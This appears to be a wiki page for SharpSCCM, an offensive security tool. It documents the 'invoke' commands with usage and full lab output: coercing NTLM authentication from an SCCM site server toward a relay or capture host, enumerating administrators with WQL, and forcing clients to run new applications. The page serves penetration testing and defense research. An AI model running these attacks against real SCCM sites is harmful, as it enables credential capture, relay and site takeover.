-
Notifications
You must be signed in to change notification settings - Fork 86
invoke
Chris edited this page Feb 16, 2023
·
11 revisions
A group of commands that execute actions on a management point
SharpSCCM invoke [command] [options]
Options: -mp, --management-point The IP address, FQDN, or NetBIOS name of the management point to connect to (default: the current management point of the client running SharpSCCM) -sc, --site-code The three character site code (e.g., "PS1") (default: the site code of the client running SharpSCCM) --debug Print debug messages for troubleshooting -?, -h, --help Show help and usage information
client-push Force the primary site server to authenticate to an arbitrary destination via NTLM using each configured account and its domain computer account
query <query> Execute a given WQL query on a management point or other server
update Force clients to check for updates and execute any new applications that are available
Force the primary site server to authenticate to an arbitrary destination via NTLM using each configured account and its domain computer account
- Automatic site assignment and site-wide client push installation are enabled
- Fallback to NTLM authentication is not explicitly disabled (default)
- PKI certificates are not required for client authentication (default)
SharpSCCM invoke client-push [options]
Options:
-a, --as-admin Connect to the server via WMI rather than HTTP to force authentication (requires Full Administrator access and device record
for target)
-c, --certificate <certificate> The encoded X509 certificate blob to use that corresponds to a previously registered device
-i, --client-id <client-id> The SMS client GUID to use that corresponds to a previously registered device and certificate
-t, --target <target> The NetBIOS name, IP address, or if WebClient is enabled on the site server, the IP address and port (e.g.,
"192.168.1.1@8080") of the relay/capture server (default: the machine running SharpSCCM)
-mp, --management-point <management-point> The IP address, FQDN, or NetBIOS name of the management point to connect to (default: the current management point of the
client running SharpSCCM)
-sc, --site-code <site-code> The three character site code (e.g., "PS1") (default: the site code of the client running SharpSCCM)
--debug Print debug messages for troubleshooting
-?, -h, --help Show help and usage information
Create a new device record and data discovery record with the NetBIOS name of the local machine to coerce NTLMv2 authentication from the primary site server's client push installation accounts and computer account:
.\SharpSCCM.exe invoke client-push
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: ATLAS.APERTURE.SCI
[+] Site code: PS1
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A08205810482057D3082057930820575060B2A864886F70D010C0A0102A08204EE308204EA301C060A2A864886F70D010C0103300E0408B9FEEA72C6826C3B020207D0048204C8C2FF01C6BD3332048506CBBB5F28E143FB859CDEBDC83DE57138D731EEF3F123D50334ABF5E7610E4D9760A06CCA1D6CF4631E0D28F86054A0502E55888E506F1605B4E8BAF282E1F88995D8E6AB3F074CC3B2EB6D5101D3279D0990AC6A05CC97F905F800402C0B391947C8287E42EC66CDA79CBC0CAFB50E7346BE62E119F76865CC92540C823AEFDE45B9650BCE4BE3D362AF8D67E10252CDF1E7C08B739C1D4FD7226DD08B5D0338513C940F17113EDD34C6EEC88C6F8BFC498C1D0F64A33CEBDC0ECB3A0CFA5ADC06082FBB0E3F9858E94D53A00F9B08D2C1C39A724FE7D2C8D75DE24478E048F7EFA6B05AA39AED87A37C4276B6213F99B424E7476FEDC3721CBEDBED4F4DE41DEB9CAF97249A4466130456DD977963EDFCFCD436A6614E40731D5765FFDC050A86D4896745C383E08BA94CA7FB1AD43903BCECF964BE9F57EFA2B54AF46D75E47FA10C0D7C95D2943663C30B0184AE47D89CE1B8A1D41F19C3BE87BF23ED258F65213ADF366427DA82FCC36A2521A033F9E70BE596925D72BB5C951F893D8FEA2C0B00D81B99E25F3195F09735789A51C1CFBE57A8097F0B639A3E634463C082AD732987FAD12C62122F80081FE3448889C865F80704CAAA528473ADB8841FF09563F2E7560E0C96BB2776E0EA1004B9197C3E56D1C0A887B74FA6FF352520E88A03AA69768B2A831DB3A463FD07389B8D48F4CDF77E97608990DE0F54A57E20ECB807C0BA297B265179ED20400DA71BADF63D9C27DC49E487D2CB1C950146A80499F1C6C5998331E3E9401DB8A39E77A66244ACB96775F53B92DFEFECBC35BE04BCED1B91653F4CB0C36C5148CB40301EA3E1CC8973E610C38BD8132C15B0C8CE272B991CEF933C5E38398F06954D3591B9739E42AC600AD303E6140A5B2745C6FF15E6825479E2BC6E6F90B3D297EF363A4FC31BDB25B9EEDB39B97237BC9BB3B03BA93EDD1AA94187426877AF60905EAF0653BB7FDBB2F70D76D0BC6A070897D578FB0ECB9B1CA44B65094F77E827B02AEBDA217E18CD67BA27DD32EC2BDFA394FAFD79D6DEA56B8CA66C950170FBF961553BC285B5F6C27F8889938818B2462D32D048DB9D3C5ACB3969E6DE2DBD8A35685BA9A7864C0160562C895F248C0786A57B03DD959AF04A4A9C09BAE0FC1F8DCB5E39B2EE9DF9F41537CC1C96D0952D7A0E5C852FD3388434154B37D529B5F11F44BBB2C5683CFE3D5E83F30AAE8B062C0BB27A51F6AA33F0A68211BAED5E731A5B1622FC6E5799CE7662657E3227D2103AD785B1B1F50021421078D434705F1577D0E4D73245F42C6B7C58F8EBE98ED6590965FF9AE7001C30C86DB2C35E0CB2B100E1579A34B17680C15489E9F834080460726372CE7FD5DD5D34D7D94A0D76206B4C8AF7AF5BB8614017210B0A4A88DCAB65D963983C636E162CF445FEB737B26FAF303A5065316A98B33B68C76F0C0650096B7AB146F65D46CBF6EF8B1B4072E8E9893285A7CDC9E113B5B77C76CD8A93A11BCE5387B5B2B4413C3D1CAA49DFFF858FC486EB0EB0BF415C8F5CB90671A5A87CFB9F23465A9B6720CED39755E35F1E1C2878C3A8717B42E6E950DAC3647EB80C9B6D692C8CEFF3984126AC2833020F177B984E636EBCD76267CBACB9E5E7419F1905E00F052C92B516322A9D66A544B2D9CAB2AE18E6BB41BCAFAE385DC3814EDA4F71EB8F4648CF4EE93C12CC69AC73A63EA4AD20E4853174301306092A864886F70D0109153106040401000000305D06092B060104018237110131501E4E004D006900630072006F0073006F0066007400200053006F0066007400770061007200650020004B00650079002000530074006F0072006100670065002000500072006F00760069006400650072308203DF06092A864886F70D010706A08203D0308203CC020100308203C506092A864886F70D010701301C060A2A864886F70D010C0103300E04088CF98E0589E66C49020207D080820398C5FAE69AD26CE90EEC64F5F292E402BE097EBA8BA53348858F311974BC3FB2CBB613A6A8A6CA1A27453455ACF929CE03583CED6FDCEC19E593148D16CF08659E1340D02267DF027EB3EEB65730D750E6970FC7B63592CCA17BBD439B08D81D6F10B997E1B998D07B7F0CF43F45401554C014001AB0E6E62BE064C4C70FAE5F624D53B49FCD78FBF1EAD386A0288E885BFF9BA80787E3401955EBECC93B9F3A9A161BC7C1DF9090B18D21BE78C42E3C87BF4CDE6EE5A5C464D830DD9F096D4CC9A5A4F952DA99D049251B76E1BCD81848E2BD82B8F290FA2A66345694E4C01BB4D86D6AC63C6E2F222E4ECB0EE2DC81B68166D7DC77C6557FC6F46F9D083934B2B26539767E4BDA0526EF7A1D01BED2D29580773F30274C4781474C81857036D7A2089B04D3C9677E3A9649F77FF57D3F04228B23074B02D7DF2DAFBF8F7B7DE4052E54B5051B38B492B9E99226D0B8906774B28A0AC93B88643999972EE0E71338D7978E09B246E23B4063BA034655A17D7AB1D9B898CD40DD4F06AD1077A03602CDA969F60B27EA35C2CAE508A58907ADFAF0C641CDE865984A01F028053470C819FBAE3D861B0E979E357E656687BD0FCBE376F18D5492168EA97E860E71B604E42BFF10F5D31ED3F282691C232EC99BBBB16A70AFD7E812B65D0C62E4CCF40E758D03BA4B57869BCCF2A3182A7B16DB3BA5C3AC909E4509B6FDF4EEA7A61868BFF5474FE1FBEB7A8CB799893BD83D6C38924C070E3E225C8C8CEAB8DDBC3880E712E5986866EBB103B5013AD294BFE69EE0614C6615B9A91F5D465C2B9D51DE187C5C24ECA7968DAE07E25913CE8E02C719F91F28A0737D90FA526FF8415430B24DD3D22E655CC7570BD54F8E3ED268632FE579E85CD8A5536BB2C785DEC3D33B05D190031A5187582B568D1E33F31DD9A2752814ACA5385BC7FC8916394242FE4F99422DD3AF4542C0B4F594CA4A933FF71F7F6665F50D6C5D5396A3B6F0A45B6D3B4F7D7DF4D96953C1079BA1E2447826981F26290BF421D8FA66806A77AA1135D066327CDBE88E4386D90BE45A3DADB1A64DD287CB919DCD21A4150A21A768FDD27708C2B6AF45E6CA256E5A0ED70AF6B0A8B831E89364C6D6CBC54B9C1970B835C734019BBEEEA17F2C501222E5B52FFB40F32CDC0E11279D43A3D92B151A770B6BA8DD1AFCEEFD24BD1F5A331E1C95EE1B9BDDD105B033CB768A1E6447FC5FEE537EF9FF16C2C79B95AB9B3FF014FBB7373FA06C7BEF546CB9AB171B5D06AA73519C74AEC2ED5835BE6AA47F974953B066148123303B301F300706052B0E03021A0414C536DF6BA7B6DBEDDE708C7DCBA08D4050ABF1240414E6323E7D077665BBFBE1347AD88945622C4D69F1020207D0
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: CAVE-JOHNSON-PC.APERTURE
NetBIOS name: CAVE-JOHNSON-PC
Site code: PS1
[+] Sending HTTP registration request to ATLAS.APERTURE.SCI:80
[+] Received unique SMS client GUID for new device:
GUID:22BFD6C6-26E5-4286-BCF5-9589CF452A4B
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:22BFD6C6-26E5-4286-BCF5-9589CF452A4B to MP_DdrEndpoint endpoint on ATLAS.APERTURE.SCI:PS1 and requesting client installation on CAVE-JOHNSON-PC
[+] Completed execution in 00:00:06.6729439
- https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a
- https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1
Execute a given WQL query on a management point or other server
Permitted security roles: - ACLs are applied at the object class and instance level
SharpSCCM invoke query <query> [options]
Arguments:
<query> The WQL query to execute
Options:
-n, --wmi-namespace <wmi-namespace> The WMI namespace to query (default: "root\SMS\site_<site-code>")
-mp, --management-point <management-point> The IP address, FQDN, or NetBIOS name of the management point to connect to (default: the current management point of the
client running SharpSCCM)
-sc, --site-code <site-code> The three character site code (e.g., "PS1") (default: the site code of the client running SharpSCCM)
--debug Print debug messages for troubleshooting
-?, -h, --help Show help and usage information
Execute the WQL query SELECT * FROM SMS_Admin on the current management point in the root\SMS\site_<sitecode> WMI namespace:
.\SharpSCCM.exe invoke query "SELECT * FROM SMS_Admin"
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: ATLAS.APERTURE.SCI
[+] Site code: PS1
[+] Connecting to \\ATLAS.APERTURE.SCI\root\SMS\site_PS1
[+] Executing WQL query: SELECT * FROM SMS_Admin
-----------------------------------
SMS_Admin
-----------------------------------
AccountType: 0
AdminID: 16777217
AdminSid: S-1-5-21-3371398565-414029199-3966136581-1110
Categories: SMS00ALL
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
CreatedBy: APERTURE\sccmadmin
CreatedDate: 20230104011428.000000+000
DisplayName: SCCM Admin
DistinguishedName:
ExtendedData: Can't display Object as a String
IsCovered: False
IsDeleted: False
IsGroup: False
LastModifiedBy: APERTURE\sccmadmin
LastModifiedDate: 20230104011428.000000+000
LogonName: APERTURE\sccmadmin
Permissions: Can't display Object as a String
RoleNames: Full Administrator
Roles: SMS0001R
SKey: PS1S-1-5-21-3371398565-414029199-3966136581-1110
SourceSite: PS1
-----------------------------------
AccountType: 0
AdminID: 16777225
AdminSid: S-1-5-21-3371398565-414029199-3966136581-1103
Categories: SMS00UNA
CategoryNames: Default
CollectionNames: All Systems, All Users and User Groups
CreatedBy: APERTURE\sccmadmin
CreatedDate: 20230112141330.000000+000
DisplayName: Cave Johnson
DistinguishedName: CN=Cave Johnson,CN=Users,DC=APERTURE,DC=SCI
ExtendedData: Can't display Object as a String
IsCovered: True
IsDeleted: False
IsGroup: False
LastModifiedBy: APERTURE\sccmadmin
LastModifiedDate: 20230117213812.000000+000
LogonName: APERTURE\cave.johnson
Permissions: Can't display Object as a String
RoleNames: Full Administrator
Roles: SMS0001R
SKey: PS1S-1-5-21-3371398565-414029199-3966136581-1103
SourceSite: PS1
-----------------------------------
[+] Completed execution in 00:00:02.8874983
Force clients to check for updates and execute any new applications that are available
Permitted security roles:
- Full Administrator
- Operations Administrator
SharpSCCM invoke update [options]
Options:
-d, --device <device> The name of the device to force to update
-i, --collection-id <collection-id> The CollectionID of the collection to force to update
-p, --policy-type <machine|user> The type of policy to update (default: "machine")
-n, --collection-name <collection-name> The name of the collection to force to update
-r, --resource-id <resource-id> The unique ResourceID of the device or user to force to update
-t, --collection-type <device|user> The type of the collection ("device" or "user")
-u, --user <user> The UniqueUserName of the user to force to update, including escaped backslashes (e.g., "APERTURE\\cave.johnson")
-mp, --management-point <management-point> The IP address, FQDN, or NetBIOS name of the management point to connect to (default: the current management point of the
client running SharpSCCM)
-sc, --site-code <site-code> The three character site code (e.g., "PS1") (default: the site code of the client running SharpSCCM)
--debug Print debug messages for troubleshooting
-?, -h, --help Show help and usage information
Force all members of the collection with CollectionID SMSDM003 to retrieve machine policy and execute any new applications available:
.\SharpSCCM.exe invoke update -i SMSDM003
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: ATLAS.APERTURE.SCI
[+] Site code: PS1
[+] Connecting to \\ATLAS.APERTURE.SCI\root\SMS\site_PS1
[+] Forcing all members of All Desktop and Server Clients (SMSDM003) to retrieve machine policy and execute any new applications available
[+] Completed execution in 00:00:01.2528668